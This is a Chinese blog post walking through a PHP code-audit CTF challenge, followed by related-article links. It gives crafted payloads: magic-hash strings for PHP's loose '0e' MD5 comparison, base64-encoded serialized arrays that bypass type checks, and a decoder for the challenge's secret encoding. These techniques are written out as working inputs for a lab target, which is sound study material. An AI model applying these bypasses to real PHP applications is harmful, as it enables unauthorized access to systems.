php带帽接口_一道php代码审计的writeup

最新推荐文章于 2022-08-15 21:26:18 发布
最新推荐文章于 2022-08-15 21:26:18 发布
阅读量114 收藏
点赞数
文章标签: php带帽接口
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35473090/article/details/112842866
版权

@Szrzvdny的题

首先访问网站

http://118.89.157.11/code/

访问index.txt

我就直接复制到notepad++里了, 看着比较方便

看代码

md5解密结果: HaHa

HTTP_BGROTNYSPXPD在http包中也没有, 尝试直接构造

返回 man,your need Crack Md5

来到下一段if语句

md5解密结果: !#%ASFASDY#$&ASF

在burp中构造

Go

hash先不管, 看下一段if

$pass=unserialize(base64_decode($_GET['pass']));

它是先解密然后再反序列化, 那么我们就要先序列化在加密

if($pass!=='' &&is_array($pass)){

$a=$pass['a'];

$b=$pass['b'];

$c=$pass['c'];

同时这里的$pass要是数组

直接在本地echo序列化的内容

那么初始代码就是这样的

$arr = array('a'=>'a','b'=>'b','c'=>'c');

echo base64_encode(serialize($arr));

?>

不过下面的if就有点变态了

if((md5($a) == md5($b) && $a !== $b)){

echo "WOW!
";

$v1=1;

http://www.cnblogs.com/Primzahl/p/6018158.html

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

原来要利用php的一个缺陷

用这两个字符串

s878926199a

0e545993274517709034328855841020

s1091221200a

0e940624217856561557816327384675

更改代码

$arr = array('a'=>'s878926199a','b'=>'s1091221200a','c'=>'c');

echo base64_encode(serialize($arr));

?>

echo输出

YTozOntzOjE6ImEiO3M6MTE6InM4Nzg5MjYxOTlhIjtzOjE6ImIiO3M6MTI6InMxMDkxMjIxMjAwYSI7czoxOiJjIjtzOjE6ImMiO30=

构造参数

提交

出现WOW!

还是if

if(strlen($c)<4 && $c>99999999){

echo "666666!";

$v2=1;

}

$c要小于4并大于99999999

这里虽然是strlen, 但没说$c一定要是字符串

回到本地测试

$arr = array('a'=>'s878926199a','b'=>'s1091221200a','c'=>array('aaa'));

$c = $arr['c'];

if(strlen($c)<4 && $c>99999999){

echo "666666!";

}

echo base64_encode(serialize($arr));

?>

访问

出现Warning并输出666666!

YTozOntzOjE6ImEiO3M6MTE6InM4Nzg5MjYxOTlhIjtzOjE6ImIiO3M6MTI6InMxMDkxMjIxMjAwYSI7czoxOiJjIjthOjE6e2k6MDtzOjM6ImFhYSI7fX0=

burp构造 提交

继续看代码

$aa = base64_decode($_GET['file']);

$bb = base64_decode($_GET['file1']);

if((md5($aa) == md5($bb) && $aa !== $bb)){

if(encodeSecret($_GET['onet']) == $encodedSecret){

echo $flag;

}else{

echo 'come on baby';

}

}else{

echo "On On On";

}

get传递file1 file2, 同时要用base64加密, 然后是比较md5

依然用这两个

s878926199a

s1091221200a

Go

输出come on baby

if(encodeSecret($_GET['onet']) == $encodedSecret){

echo $flag;

}else{

echo 'come on baby';

查看encodeSecret

function encodeSecret($secret) {

return bin2hex(strrev(base64_encode($secret)));

}

Hash:3d3d516343746d4d6d6c315669563362

bin2hex 转16进制

转回去 pack("H*",bin2hex($str))

strrev 翻转字符串

只要再翻转一次就可以了

回到本地

function decodeSecret($str){

return base64_decode(strrev(pack("H*",$str)));

}

echo decodeSecret('3d3d516343746d4d6d6c315669563362');

?>

burp构造, 得到了flag

函明
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见的Java审计代码函数关键字_基于Java关键词审计技巧?网络安全源代码审计...
weixin_36255898的博客
02-25 248
网络安全学习中,源代码审计是较为重要的一项。源代码审计分为白盒、黑盒、灰盒。审计方法也有多种。但是基于关键词审计技巧有什么?是很多人都想了解的。以下是基于Java审计关键词审计技巧总结:在搜索时要注意是否为整个单词,以及小写敏感这些设置java审计密码硬编码、密码明文存储:password、pass、jdbcXSS:getParamter、<%=、param.任意文件下载:download、...
小明学习代码审计writeup
weixin_30609287的博客
07-18 411
小明学习代码审计writeup 题目来自hackinglab.cn 综合关 题目地址:http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php 访问题目地址得到如下源码: Please Reset Your Password Then Get your flag! <a href="./rese...
尽最大可能分析上传源码及漏洞利用方式
weixin_33735077的博客
07-18 181
0x00 简单源码分析 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 <?php if ((($_FI...
[Java代码审计]javacon WriteUp
Y4tacker的博客
07-21 934
文章目录写在前面javacon 写在前面 在P神星球看到的,这里学习一下,文件在https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar javacon 运行的时候利用java -jar challenge-0.0.1-SNAPSHOT.jar 首先查看配置 首先在登录页面,在login页面post接收参数,与配置当中的比对,成功则设置cookie @PostMapping({"/login"})
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1751
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
蓝帽杯one_Pointer_php writeup
05-10
蓝帽杯one_Pointer_php writeup
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
writeup_knkl_
09-30
【标题】"writeup_knkl_" 暗示了这是一个关于技术分析或漏洞报告的文档,其中"knkl"可能是某种缩写,可能代表一个特定的技术、工具或概念。由于描述部分"Raghav abnsaklfmleamafl;emgl;aeg"看起来像是随机字符序列,...
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
下载并搭建VAuditDemo漏洞代码审计平台
1stPeak's Blog
12-10 4844
前言: 这几天学习在I春秋学习PHP代码审计实战,视频中使用了VAuditDemo漏洞代码审计平台,因而这里总结一下下载与搭建的过程 首先:下载VAuditDemo源码,这个源码的作者是Virink,我保存到了我的github上面。 索引目录: VAuditDemo下载地址 phpStudy下载地址 安装phpStudy的步骤 搭建VAduitDemo步骤 VAuditDemo下载...
BugkuCTF - 练习平台 - 代码审计——Writeup
今天吃什么
02-15 615
1.extract变量覆盖 白话代码: 一个名叫flag的变量等于‘xxx’ 将通过GET传过来的数组转为一个名为数组名,值为数组值的变量(如果新的变量和已有变量重名,会将已有变量替换) 如果存在一个名叫shiyan的字符串 将flag变量的值赋给名为content变量 如果变量shiyan和变量content的值相同, 就输出flag的值 否则就输出Oh,no 因为extract()会把符号表...
PHP代码审计系列(一) 基础:方法、思路、流程
st3pby的博客
06-18 1567
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。Fotify|代码审计静态扫描工具,商业化静态代码扫描工具,误报率相对较低。seay|源代码审计工具PHPStorm|是PHP编程语言开发的集成环境。chrome & burp & HackerBar 插件 & xdebug插件Xcheck |Xcheck是一个由腾讯公司CSIG质量部代码安全检查团队自研的静态应用安全测试工具。Xcheck在基于成熟的污点分析技术与
DAY31:代码审计基础( PHP 篇)
qq_49433473的博客
08-15 2368
php代码审计代码审计基础,代码审计思路及工具
bugctf web代码审计 writeup
river
03-20 434
把题目做完了,记录一下题解 extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> ...
BugkuWeb题目解析
北观止的博客
07-31 8895
BugkuWeb 1.web2 解析: 源码中有注释 答案: KEY{Web-2-bugKssNNikls9100} 2、计算器 题目出现了一个很简单的验证码,只要输入正确就可以获得flag,但是尝试后发现题目的输入框只能输入一个数字, 果断审查元素,发现了输入框的最大长度被设置成了1,于是修改输入框的maxlength属性为5 输入结果就可以了 来自 https://www.cnblogs.com/kele1997/p/7595839.html flag{CTF-bugku-0032} 3.Web基础$
代码审计实战积累2
赵花花08042的博客
06-09 622
前言:一些代码审计过程中学习到的点
代码审计】—JAVA项目注入、上传、插件挖掘
haoaaao的博客
08-06 530
代码审计】—JAVA项目注入、上传、插件挖掘
CTF-Web-代码审计11题
weixin_38131137的博客
07-04 1385
上一周新找的靶场里面的题,最近太忙,花了快两周才做完,记录一下,免得做完忘记思路。 1、http://395115b6e98f1b6b21ee56eb5ef89614.synctf.com:8002/basic/base09/ 直接看到代码 可知道这个是文件包含?file=flag.txt 所以直接构造?file=flag.php 得到一段代码 可知这是一段加密代码,解密的话要用到decrypt,密钥有,相关要解密内容也有,直接写一段新的解密代码 编译得结果flag 2、http://3951..
2019 ISCC CTF挑战:代码审计解密PHP脚本
在2019年信息安全挑战大会(ISCC)的CTF安全比赛中,有一道相对简单的题目,题目名为"2019ISCC writeup"。这道题目属于代码审计类别,主要考察参赛者对PHP函数的理解和利用,特别是涉及到的缺陷或特性分析。挑战者需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值